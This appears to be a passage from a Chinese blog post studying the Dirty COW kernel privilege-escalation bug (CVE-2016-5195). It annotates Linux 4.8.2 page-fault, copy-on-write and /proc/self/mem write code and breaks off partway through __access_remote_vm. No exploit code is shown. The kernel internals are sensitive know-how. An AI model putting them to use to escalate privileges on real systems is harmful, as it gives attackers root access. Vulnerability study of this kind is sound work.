CVE-2016-5195(Dirty Cow) Remake

本文最后更新于:2024年3月6日 晚上

0x00:写在一切之前

把A3👴的kernel Ⅰ和kernel Ⅱ追完了

康康能不能复现一些kernel CVE

0x01:信息收集

NVD - CVE-2016-5195 (nist.gov)

2016年10月18日,黑客Phil Oester提交了隐藏长达9年之久的“脏牛漏洞(Dirty COW)”0day漏洞。该漏洞表明Linux内核的内存子系统在处理写时复制(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。黑客可以获取低权限的本地用户后,利用此漏洞获取其他只读内存映射的写权限,进一步获取root权限。

Dirty Cow在2.x到4.8.2及以下的version中都可以完成利用,作用范围十分广泛。最后,此漏洞由linux创始人linus亲手修复

0x02:前置

文中所有的源码均为4.8.2 version

COW(copy-to-write)

写时复制(Copy-on-Write,COW)是一种计算机编程中的优化技术,通常用于处理共享数据的情况。在使用写时复制时,系统会在多个客户端(或者线程)共享同一份数据的情况下,只有在有一个客户端试图修改数据时才会复制数据,以确保修改操作不会影响其他客户端。

具体到fork()中来说,父进程和子进程共享同一个页框,只有当其中两方中的任意一方试图修改该页框中的内容时,才会分配一个新的页框,将原先页框的内容copy到新的页框,在新的页框进行修改

  • fork()执行后,父子进程共享所有页框,所有页框被标记为read-only
  • 当要修改页框时,因为是read-only,所以会触发page fault(缺页异常)——内核才会分配一个新的页框

大致流程如下图所示。别骂了别骂了知道我字丑呜呜呜:(

mmap与COW

当我们使用 mmap 将一个文件映射到内存时,并且该文件具有只读权限而没有写权限时,若我们尝试向这个映射区域写入数据,系统会启动写时复制(copy-on-write)机制。这会导致系统将文件内容的副本拷贝到内存中,以便进程可以对这个区域进行修改,而不会影响到硬盘上原始文件的内容。

缺页异常 page fault

当操作系统尝试访问存储器中的页面(页)时,如果该页当前不在主存(RAM)中,就会发生缺页异常(page fault)。缺页异常通常是由于以下几种情况引起的:

  1. 页面不在内存中:当程序需要访问一个页面,而该页面尚未加载到内存中时。这可能是因为页面曾经在内存中,但已经被换出到磁盘上,或者是因为程序访问了一个新的页面。
  2. 非法访问:程序尝试访问未被分配给它的内存区域,或者访问已经被释放的内存区域。
  3. 页面保护:程序尝试写入只读的内存区域,或者执行未被允许的操作。

处理流程

1
2
3
4
5
6
7
8
__do_page_fault()
handle_mm_fault()
__handle_mm_fault()
handle_pte_fault()
do_fault()
do_cow_fault()
do_wp_page()

__do_page_fault

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
/*
* This routine handles page faults. It determines the address,
* and the problem, and then passes it off to one of the appropriate
* routines.
*
* This function must have noinline because both callers
* {,trace_}do_page_fault() have notrace on. Having this an actual function
* guarantees there's a function trace entry.
*/
static noinline void
__do_page_fault(struct pt_regs *regs, unsigned long error_code,
unsigned long address)
/*struct pt_regs *regs:保存了页面错误发生时的 CPU 寄存器状态。
unsigned long error_code:错误代码,用于指示页面错误的类型。
unsigned long address:引发页面错误的内存地址。*/
{
struct vm_area_struct *vma;
struct task_struct *tsk;
struct mm_struct *mm;
int fault, major = 0;
unsigned int flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;

/*从当前任务结构中获取内存管理结构 mm,并通过该结构找到触发页面故障的地址所属的内存区域 vma*/
tsk = current;
mm = tsk->mm;

/*
* Detect and handle instructions that would cause a page fault for
* both a tracked kernel page and a userspace page.
*/
if (kmemcheck_active(regs))
kmemcheck_hide(regs);
prefetchw(&mm->mmap_sem);

if (unlikely(kmmio_fault(regs, address)))
return;

/*
* We fault-in kernel-space virtual memory on-demand. The
* 'reference' page table is init_mm.pgd.
*
* NOTE! We MUST NOT take any locks for this case. We may
* be in an interrupt or a critical region, and should
* only copy the information from the master page table,
* nothing more.
*
* This verifies that the fault happens in kernel space
* (error_code & 4) == 0, and that the fault was not a
* protection error (error_code & 9) == 0.
*/
if (unlikely(fault_in_kernel_space(address))) { /*检查触发页面故障的地址是否位于内核空间。但这边不太可能发生缺页,所以用unlikely宏优化?*/
if (!(error_code & (PF_RSVD | PF_USER | PF_PROT))) {/*三个标志位:使用了页表项保留的标志位、用户空间页异常、页保护异常,三个标志位都无说明是由内核触发的内核空间的缺页异常*/
if (vmalloc_fault(address) >= 0)
return;

if (kmemcheck_fault(regs, address, error_code))
return;
}

/* Can handle a stale RO->RW TLB: */
if (spurious_fault(error_code, address))
return;

/* kprobes don't want to hook the spurious faults: */
if (kprobes_fault(regs))
return;
/*
* Don't take the mm semaphore here. If we fixup a prefetch
* fault we could otherwise deadlock:
*/
bad_area_nosemaphore(regs, error_code, address, NULL);/*发生了一个不可恢复的页面故障,直接kill*/

return;
}

/* kprobes don't want to hook the spurious faults: */
if (unlikely(kprobes_fault(regs)))
return;

if (unlikely(error_code & PF_RSVD))
pgtable_bad(regs, error_code, address);

if (unlikely(smap_violation(error_code, regs))) {/*smap,直接gg*/
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}

/*
* If we're in an interrupt, have no user context or are running
* in a region with pagefaults disabled then we must not take the fault
*/
if (unlikely(faulthandler_disabled() || !mm)) {
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}

/*
* It's safe to allow irq's after cr2 has been saved and the
* vmalloc fault has been handled.
*
* User-mode registers count as a user access even for any
* potential system fault or CPU buglet:
*/
if (user_mode(regs)) { /*生缺页异常时的寄存器状态为用户态下的*/
local_irq_enable();
error_code |= PF_USER;
flags |= FAULT_FLAG_USER;
} else {
if (regs->flags & X86_EFLAGS_IF)
local_irq_enable();
}

perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);

if (error_code & PF_WRITE)
flags |= FAULT_FLAG_WRITE;
if (error_code & PF_INSTR)
flags |= FAULT_FLAG_INSTRUCTION;

/*
* When running in the kernel we expect faults to occur only to
* addresses in user space. All other faults represent errors in
* the kernel and should generate an OOPS. Unfortunately, in the
* case of an erroneous fault occurring in a code path which already
* holds mmap_sem we will deadlock attempting to validate the fault
* against the address space. Luckily the kernel only validly
* references user space from well defined areas of code, which are
* listed in the exceptions table.
*
* As the vast majority of faults will be valid we will only perform
* the source reference check when there is a possibility of a
* deadlock. Attempt to lock the address space, if we cannot we then
* validate the source. If this is invalid we can skip the address
* space check, thus avoiding the deadlock:
*/
if (unlikely(!down_read_trylock(&mm->mmap_sem))) {
if ((error_code & PF_USER) == 0 &&
!search_exception_tables(regs->ip)) {
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
retry:
down_read(&mm->mmap_sem);
} else {
/*
* The above down_read_trylock() might have succeeded in
* which case we'll have missed the might_sleep() from
* down_read():
*/
might_sleep();
}

vma = find_vma(mm, address);
if (unlikely(!vma)) {
bad_area(regs, error_code, address);
return;
}
if (likely(vma->vm_start <= address))/*检查触发页面故障的地址是否在当前进程的内存映射区域内*/
goto good_area;
if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
bad_area(regs, error_code, address);
return;
}
if (error_code & PF_USER) {/*缺页异常地址位于用户空间*/
/*
* Accessing the stack below %sp is always a bug.
* The large cushion allows instructions like enter
* and pusha to work. ("enter $65535, $31" pushes
* 32 pointers and then decrements %sp by 65535.)
*/
if (unlikely(address + 65536 + 32 * sizeof(unsigned long) < regs->sp)) {
bad_area(regs, error_code, address);
return;
}
}
if (unlikely(expand_stack(vma, address))) {/*调用 expand_stack() 函数尝试扩展栈区*/
bad_area(regs, error_code, address);
return;
}

/*
* Ok, we have a good vm_area for this memory access, so
* we can handle it..
*/
/*运行到这里,说明是正常的缺页异常,addr属于进程的地址空间,此时进行请求调页,分配物理内存*/
good_area:
if (unlikely(access_error(error_code, vma))) {
bad_area_access_error(regs, error_code, address, vma);
return;
}

/*
* If for any reason at all we couldn't handle the fault,
* make sure we exit gracefully rather than endlessly redo
* the fault. Since we never set FAULT_FLAG_RETRY_NOWAIT, if
* we get VM_FAULT_RETRY back, the mmap_sem has been unlocked.
*/
/*核心function*/
fault = handle_mm_fault(vma, address, flags);
major |= fault & VM_FAULT_MAJOR;

/*
* If we need to retry the mmap_sem has already been released,
* and if there is a fatal signal pending there is no guarantee
* that we made any progress. Handle this case first.
*/
if (unlikely(fault & VM_FAULT_RETRY)) {
/* Retry at most once */
if (flags & FAULT_FLAG_ALLOW_RETRY) {
flags &= ~FAULT_FLAG_ALLOW_RETRY;
flags |= FAULT_FLAG_TRIED;
if (!fatal_signal_pending(tsk))
goto retry;
}

/* User mode? Just return to handle the fatal exception */
if (flags & FAULT_FLAG_USER)/*用户态触发用户地址空间缺页异常,交由上层函数处理了*/
return;

/* Not returning to user mode? Handle exceptions or die: */
no_context(regs, error_code, address, SIGBUS, BUS_ADRERR);
return;
}

up_read(&mm->mmap_sem);/*释放内存管理结构的读锁*/
if (unlikely(fault & VM_FAULT_ERROR)) {
mm_fault_error(regs, error_code, address, vma, fault);
return;
}

/*
* Major/minor page fault accounting. If any of the events
* returned VM_FAULT_MAJOR, we account it as a major fault.
*/
if (major) {/*如果页面故障被标记为 Major,则增加任务的 maj_flt 计数器;否则,增加 min_flt 计数器*/
tsk->maj_flt++;
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
} else {
tsk->min_flt++;
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);/*记录页面故障事件,用于性能统计*/
}

check_v8086_mode(regs, address, tsk);
}
NOKPROBE_SYMBOL(__do_page_fault);

A3👴总结的流程如下:

  • 判断缺页异常地址位于用户地址空间还是内核地址空间
  • 位于内核地址空间
    • 内核态触发缺页异常,vmalloc_fault() 处理
    • 用户态触发缺页异常,段错误,发送SIGSEGV信号
  • 位于用户地址空间
    • 内核态触发缺页异常
      • SMAP保护已开启,终止进程
      • 进程无地址空间 | 设置了不处理缺页异常,终止进程
      • 进入下一步流程
    • 用户态触发缺页异常
      • 设置对应标志位,进入下一步流程
    • 检查是否是写页异常,可能是页不存在/无权限写,设置对应标志位
    • 找寻线性地址所属的线性区(vma)[1]
      • 不存在对应vma,非法访问
      • 存在对应vma,且位于vma所描述区域中,进入下一步流程
      • 存在对应vma,不位于vma所描述区域中,说明可能是位于堆栈(stack),尝试增长堆栈
    • ✳调用handle_mm_fault()函数处理,这也是处理缺页异常的核心函数
      • 失败了,进行重试(返回到[1],只会重试一次)
      • 其他收尾处理

__handle_mm_fault

总8会有人连4级页表还不知道吧

Linux中,虚拟内存管理采用了多级页表的方式来实现。在x86架构下,Linux使用了4级页表(4-level paging),也称为多级页表(multilevel paging)或者分层页表(hierarchical paging)。

4级页表是指由四个级别的页表组成的层次结构,每个级别的页表负责将虚拟地址映射到物理地址的不同部分。这些级别依次为:

  1. 页全局目录表(Page Global Directory,PGD):第一级页表,用于将虚拟地址转换为页上级目录表(Page Upper Directory,PUD)的索引。
  2. 页上级目录表(Page Upper Directory,PUD):第二级页表,用于将虚拟地址转换为页中间目录表(Page Middle Directory,PMD)的索引。
  3. 页中间目录表(Page Middle Directory,PMD):第三级页表,用于将虚拟地址转换为页表(Page Table,PT)的索引。
  4. 页表(Page Table,PTE):第四级页表,用于将虚拟地址转换为物理地址。

再要认识一个结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
struct fault_env {
struct vm_area_struct *vma; /* Target VMA */
unsigned long address; /* Faulting virtual address */
unsigned int flags; /* FAULT_FLAG_xxx flags */
pmd_t *pmd; /* Pointer to pmd entry matching
* the 'address'
*/
pte_t *pte; /* Pointer to pte entry matching
* the 'address'. NULL if the page
* table hasn't been allocated.
*/
spinlock_t *ptl; /* Page table lock.
* Protects pte page table if 'pte'
* is not NULL, otherwise pmd.
*/
pgtable_t prealloc_pte; /* Pre-allocated pte page table.
* vm_ops->map_pages() calls
* alloc_set_pte() from atomic context.
* do_fault_around() pre-allocates
* page table to avoid allocation from
* atomic context.
*/
};

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
static int __handle_mm_fault(struct vm_area_struct *vma, unsigned long address,
unsigned int flags)
{
struct fault_env fe = {//创建一个 fault_env 结构体 fe,其中包含了 vma、address 和 flags 等信息
.vma = vma,
.address = address,
.flags = flags,
};
struct mm_struct *mm = vma->vm_mm;
pgd_t *pgd;//页全局目录项
pud_t *pud;//页上级目录项

pgd = pgd_offset(mm, address);//获取全局页表项
pud = pud_alloc(mm, pgd, address);//获取页上级目录项
if (!pud)//获取页上级目录项失败,gg
return VM_FAULT_OOM;
fe.pmd = pmd_alloc(mm, pud, address);//获取页中级目录项
if (!fe.pmd)//获取页中级目录项失败,gg
return VM_FAULT_OOM;
if (pmd_none(*fe.pmd) && transparent_hugepage_enabled(vma)) {/*页面的页表项为空且透明大页已启用,那么它会调用 create_huge_pmd 函数尝试创建一个大页。这个函数的目的是尝试将多个物理页映射到一个大页上,从而提高内存访问效率。8懂,chat的*/
int ret = create_huge_pmd(&fe);
if (!(ret & VM_FAULT_FALLBACK))/*gg*/
return ret;
} else {
pmd_t orig_pmd = *fe.pmd;
int ret;

barrier();
if (pmd_trans_huge(orig_pmd) || pmd_devmap(orig_pmd)) {
if (pmd_protnone(orig_pmd) && vma_is_accessible(vma))
return do_huge_pmd_numa_page(&fe, orig_pmd);

if ((fe.flags & FAULT_FLAG_WRITE) &&
!pmd_write(orig_pmd)) {
ret = wp_huge_pmd(&fe, orig_pmd);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
huge_pmd_set_accessed(&fe, orig_pmd);
return 0;
}
}
}

return handle_pte_fault(&fe);//进入核心处理函数
}

handle_pte_fault

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
/*
* These routines also need to handle stuff like marking pages dirty
* and/or accessed for architectures that don't do it in hardware (most
* RISC architectures). The early dirtying is also good on the i386.
*
* There is also a hook called "update_mmu_cache()" that architectures
* with external mmu caches can use to update those (ie the Sparc or
* PowerPC hashed page tables that act as extended TLBs).
*
* We enter with non-exclusive mmap_sem (to exclude vma changes, but allow
* concurrent faults).
*
* The mmap_sem may have been released depending on flags and our return value.
* See filemap_fault() and __lock_page_or_retry().
*/
static int handle_pte_fault(struct fault_env *fe)
{
pte_t entry;

if (unlikely(pmd_none(*fe->pmd))) {//页表指针为空,表示相应的页表项还未分配。在这种情况下,将 fe->pte 设为 NULL
/*
* Leave __pte_alloc() until later: because vm_ops->fault may
* want to allocate huge page, and if we expose page table
* for an instant, it will be difficult to retract from
* concurrent faults and from rmap lookups.
*/
fe->pte = NULL;
} else {
/* See comment in pte_alloc_one_map() */
if (pmd_trans_unstable(fe->pmd) || pmd_devmap(*fe->pmd))
return 0;
/*
* A regular pmd is established and it can't morph into a huge
* pmd from under us anymore at this point because we hold the
* mmap_sem read mode and khugepaged takes it in write mode.
* So now it's safe to run pte_offset_map().
*/
fe->pte = pte_offset_map(fe->pmd, fe->address);//使用 pte_offset_map 函数获取给定虚拟地址的页表项指针,并读取该页表项的内容到 entry 变量中。

entry = *fe->pte;

/*
* some architectures can have larger ptes than wordsize,
* e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and
* CONFIG_32BIT=y, so READ_ONCE or ACCESS_ONCE cannot guarantee
* atomic accesses. The code below just needs a consistent
* view for the ifs and we later double check anyway with the
* ptl lock held. So here a barrier will do.
*/
barrier();
if (pte_none(entry)) {//检查页表项是否为空(指向的物理页框是否存在),如果为空,则释放之前映射的页表项并将 fe->pte 设为空。
pte_unmap(fe->pte);
fe->pte = NULL;
}
}

if (!fe->pte) {//如果 fe->pte 为空,则说明页面不存在,根据 VMA(Virtual Memory Area)是否匿名执行不同的页面处理操作。
if (vma_is_anonymous(fe->vma))
return do_anonymous_page(fe);
else
return do_fault(fe);//分配物理页框
}

if (!pte_present(entry))//如果页面已经交换到磁盘上,则执行交换页面处理操作
return do_swap_page(fe, entry);

if (pte_protnone(entry) && vma_is_accessible(fe->vma))//如果页面是保护的,并且 VMA 是可访问的,则执行 NUMA(Non-Uniform Memory Access)页面处理操作。
return do_numa_page(fe, entry);

fe->ptl = pte_lockptr(fe->vma->vm_mm, fe->pmd);
spin_lock(fe->ptl);//自旋锁
if (unlikely(!pte_same(*fe->pte, entry)))
goto unlock;
if (fe->flags & FAULT_FLAG_WRITE) {//存在 FAULT_FLAG_WRITE 标志位,表示缺页异常由写操作引起
if (!pte_write(entry))//对应的页不可写
return do_wp_page(fe, entry);//进行写时复制,将内容写入由 do_fault()->do_cow_fault()分配的内存页中
entry = pte_mkdirty(entry);
}
entry = pte_mkyoung(entry);//将该页【标脏】
if (ptep_set_access_flags(fe->vma, fe->address, fe->pte, entry,
fe->flags & FAULT_FLAG_WRITE)) {
update_mmu_cache(fe->vma, fe->address, fe->pte);
} else {
/*
* This is needed only for protection faults but the arch code
* is not yet telling us if this is a protection fault or not.
* This still avoids useless tlb flushes for .text page faults
* with threads.
*/
if (fe->flags & FAULT_FLAG_WRITE)
flush_tlb_fix_spurious_fault(fe->vma, fe->address);
}
unlock:
pte_unmap_unlock(fe->pte, fe->ptl);//解自旋锁
return

第一次缺页异常的处理流程包括:

  • 检查页面对应的页表项是否为空,若为空则表示该页面未与物理页建立映射关系。
  • 如果页表项为空,说明页面可能是进程第一次访问,需要分配一个新的物理页,并将内容初始化为0。
  • 如果页表项不为空,可能是页面已经被换出到交换空间,需要将其交换回来。

第二次缺页异常的处理流程包括:

  • 检查页面是否在主存中,如果在主存中,继续处理;如果不在主存中,可能是因为页面被换出到交换空间,需要将其交换回来。
  • 如果页面在主存中,检查缺页异常是否由写操作引起。
    • 如果是写操作引起的缺页异常,检查页面是否可写,如果不可写,则执行写时复制操作;如果可写,则标记页面为已修改。
    • 将新内容写入页表项中。

因此,我们可以得出结论,当一个进程首次访问一个内存页时,会依次触发两次缺页异常,第一次是为了建立页面与物理页的映射关系,第二次是为了处理页面在主存中的写操作引起的缺页异常。

do_fault

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static int do_fault(struct fault_env *fe)
{
struct vm_area_struct *vma = fe->vma;//获取了指向当前虚拟内存区域(Virtual Memory Area,VMA)的指针 vma
pgoff_t pgoff = linear_page_index(vma, fe->address);//计算页面偏移量,该将线性地址转换为页面偏移量

/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
if (!vma->vm_ops->fault)//检查了 vma 对象是否具有有效的 fault 操作。如果 vma 对象中的 vm_ops 结构中的 fault 函数指针为空,说明该虚拟内存区域可能未完全初始化或者缺少 VM_DONTEXPAND 标志。在这种情况下,函数返回 VM_FAULT_SIGBUS,表示发生了总线错误。
return VM_FAULT_SIGBUS;
if (!(fe->flags & FAULT_FLAG_WRITE))//如果页面错误不是写操作,则调用 do_read_fault 函数处理读取操作。
return do_read_fault(fe, pgoff);
if (!(vma->vm_flags & VM_SHARED))//如果虚拟内存区域的标志中不包含 VM_SHARED 标志,说明该区域是私有的,函数调用 do_cow_fault 函数处理写时复制错误(Copy-On-Write Fault)。
return do_cow_fault(fe, pgoff);
return do_shared_fault(fe, pgoff);//虚拟内存区域是共享的,函数调用 do_shared_fault 函数处理共享错误
}

处理写时复制(无内存页): do_cow_fault()

本篇主要关注写时复制的过程;COW流程在第一次写时触发缺页异常最终便会进入到 do_cow_fault() 中处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
static int do_cow_fault(struct fault_env *fe, pgoff_t pgoff)
{
struct vm_area_struct *vma = fe->vma;
struct page *fault_page, *new_page;
void *fault_entry;
struct mem_cgroup *memcg;
int ret;

if (unlikely(anon_vma_prepare(vma)))
return VM_FAULT_OOM;

new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, fe->address);//为当前进程分配一个新的页面
if (!new_page)
return VM_FAULT_OOM;

if (mem_cgroup_try_charge(new_page, vma->vm_mm, GFP_KERNEL,//为新页面分配内存资源
&memcg, false)) {
put_page(new_page);
return VM_FAULT_OOM;
}

ret = __do_fault(fe, pgoff, new_page, &fault_page, &fault_entry);//读取文件内容到fault_page
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;

if (!(ret & VM_FAULT_DAX_LOCKED))
copy_user_highpage(new_page, fault_page, fe->address, vma);//拷贝fault_page内容到new_page
__SetPageUptodate(new_page);

ret |= alloc_set_pte(fe, memcg, new_page);//设置pte,置换该进程中的pte表项,对于写操作会将该页标脏(该函数会调用maybe_mkwrite()函数,其会调用pte_mkdirty()函数标脏该页)
if (fe->pte)
pte_unmap_unlock(fe->pte, fe->ptl);
if (!(ret & VM_FAULT_DAX_LOCKED)) {//释放fault_page
unlock_page(fault_page);
put_page(fault_page);
} else {
dax_unlock_mapping_entry(vma->vm_file->f_mapping, pgoff);
}
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;
return ret;
uncharge_out:
mem_cgroup_cancel_charge(new_page, memcg, false);
put_page(new_page);
return ret;
}

处理写时复制(有内存页):do_wp_page

当通过 do_fault() 获取内存页之后,第二次触发缺页异常时便会最终交由 do_wp_page() 函数处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
/*
* This routine handles present pages, when users try to write
* to a shared page. It is done by copying the page to a new address
* and decrementing the shared-page counter for the old page.
*
* Note that this routine assumes that the protection checks have been
* done by the caller (the low-level page fault routine in most cases).
* Thus we can safely just mark it writable once we've done any necessary
* COW.
*
* We also mark the page dirty at this point even though the page will
* change only once the write actually happens. This avoids a few races,
* and potentially makes it more efficient.
*
* We enter with non-exclusive mmap_sem (to exclude vma changes,
* but allow concurrent faults), with pte both mapped and locked.
* We return with mmap_sem still held, but pte unmapped and unlocked.
*/
static int do_wp_page(struct fault_env *fe, pte_t orig_pte)
__releases(fe->ptl)
{
struct vm_area_struct *vma = fe->vma;//原有的页
struct page *old_page;

old_page = vm_normal_page(vma, fe->address, orig_pte);//获取缺页的线性地址对应的struct page结构,对于一些特殊映射的页面(如页面回收、页迁移和KSM等),内核并不希望这些页参与到内存管理的一些流程当中,称之为 special mapping,并无对应的struct page结构体
if (!old_page) {//NULL,说明是一个 special mapping 页面;否则说明是normal mapping页面
/*
* VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
* VM_PFNMAP VMA.
*
* We should not cow pages in a shared writeable mapping.
* Just mark the pages writable and/or call ops->pfn_mkwrite.
*/
if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))
return wp_pfn_shared(fe, orig_pte);

pte_unmap_unlock(fe->pte, fe->ptl);
return wp_page_copy(fe, orig_pte, old_page);
}

/*
* Take out anonymous pages first, anonymous shared vmas are
* not dirty accountable.
*/
//先处理匿名页面
if (PageAnon(old_page) && !PageKsm(old_page)) {//原页面为匿名页面 && 不是ksm页面
int total_mapcount;
if (!trylock_page(old_page)) {//多线程相关操作,判断是否有其他线程的竞争
get_page(old_page);
pte_unmap_unlock(fe->pte, fe->ptl);
lock_page(old_page);
fe->pte = pte_offset_map_lock(vma->vm_mm, fe->pmd,
fe->address, &fe->ptl);
if (!pte_same(*fe->pte, orig_pte)) {
unlock_page(old_page);
pte_unmap_unlock(fe->pte, fe->ptl);
put_page(old_page);
return 0;
}
put_page(old_page);
}
//此时没有其他线程与本线程竞争了,调用 reuse_swap_page() 判断使用该页的是否只有一个进程,若是的话就直接重用该页
if (reuse_swap_page(old_page, &total_mapcount)) {
if (total_mapcount == 1) {
/*
* The page is all ours. Move it to
* our anon_vma so the rmap code will
* not search our parent or siblings.
* Protected against the rmap code by
* the page lock.
*/
page_move_anon_rmap(old_page, vma);
}
unlock_page(old_page);
return wp_page_reuse(fe, orig_pte, old_page, 0, 0);
}
unlock_page(old_page);
} else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))) {
return wp_page_shared(fe, orig_pte, old_page);
}

/*
* Ok, we need to copy. Oh, well..
*/
//实在没法重用了,进行写时复制
get_page(old_page);

pte_unmap_unlock(fe->pte, fe->ptl);
return wp_page_copy(fe, orig_pte, old_page);
}

COW和缺页异常相关流程

writeの执行流

首先先来了解一下系统调用write的执行流

sys_write

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
size_t, count)
{
struct fd f = fdget_pos(fd);//根据fd找到对应的文件对象和标志
ssize_t ret = -EBADF;

if (f.file) {
loff_t pos = file_pos_read(f.file); //读取文件对象的位置指针
ret = vfs_write(f.file, buf, count, &pos); //通过虚拟文件系统文件的写操作
if (ret >= 0)
file_pos_write(f.file, pos); //设置文件对象的位置指针
fdput_pos(f); //释放这个对象的引用
}

return ret;
}
1
2
3
4
sys_write()
vfs_write()
__vfs_write()
file->f_op->write()//该文件于内核中的文件描述符的file_operations结构体,类似于一张函数表,储存了默认的对于一些系统调用的处理函数指针

/proc/self/mem:绕过页表项权限

“脏牛”通常利用的是 /proc/self/mem 进行越权写入,这也是整个“脏牛”利用中较为核心的流程

对于/proc/self/mem这个文件对象来说, 会调用mem_write()函数

mem_write()

1
2
3
4
5
static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

mem_write调用mem_rw

mem_rw()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
static ssize_t mem_rw(struct file *file, //要读/写的文件
char __user *buf, //用户空间缓冲区
size_t count, //读/写长度
loff_t *ppos, //开始的地方
int write) //读/写
{
//根据/proc/self/mem这个文件对象的私有数据区域, 找到其映射的是哪一个虚拟地址空间, 然后在内核中申请了一个临时页作为内核缓冲区
struct mm_struct *mm = file->private_data; //mem文件的私有数据区域指向对应的虚拟内存空间
unsigned long addr = *ppos; //偏移,mm中要读写的地址
ssize_t copied;
char *page;

if (!mm)
return 0;

page = (char *)__get_free_page(GFP_TEMPORARY); //获取一个临时页,sys_write限制最多写一页
if (!page)
return -ENOMEM;

copied = 0;
if (!atomic_inc_not_zero(&mm->mm_users)) //增加一个引用
goto free;
//通过一个循环写入count长数据, copy_from_user把数据搬运到内核缓冲区中, 再调用access_remote_vm()写入虚拟地址空间中
while (count > 0) {//count表示剩余要写入的长度
int this_len = min_t(int, count, PAGE_SIZE); //本次写入多少
//把data从用户空间buf复制到内核的临时页
if (write && copy_from_user(page, buf, this_len)) {
copied = -EFAULT;
break;
}
//读写别人的虚拟地址空间
this_len = access_remote_vm(mm, addr, page, this_len, write);
if (!this_len) {
if (!copied)
copied = -EIO;
break;
}
//读取,把内核读到的数据复制到用户buf
if (!write && copy_to_user(buf, page, this_len)) {
copied = -EFAULT;
break;
}

buf += this_len; // 用户缓冲区
addr += this_len; //读写地址
copied += this_len; //读写了多少字节
count -= this_len; //还剩多少字节
}
*ppos = addr;

mmput(mm);
free:
free_page((unsigned long) page);
return copied;
}

access_remote_vm()是对__access_remote_vm的包装

1
2
3
4
5
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, int write)
{
return __access_remote_vm(NULL, mm, addr, buf, len, write);
}

__access_remote_vm()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
/*
* Access another process' address space as given in mm. If non-NULL, use the
* given task for page fault accounting.
*/
//访问mm指向的其他进程的地址空间,如果tsk非NULL,则用来进行缺页异常计数
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, int write)
{
struct vm_area_struct *vma;
void *old_buf = buf;

down_read(&mm->mmap_sem);//获取mmap_sem信号量
/* ignore errors, just check how much was successfully transferred */
while (len) {//循环,直到写入len长度
int bytes, ret, offset;
void *maddr;
struct page *page = NULL;
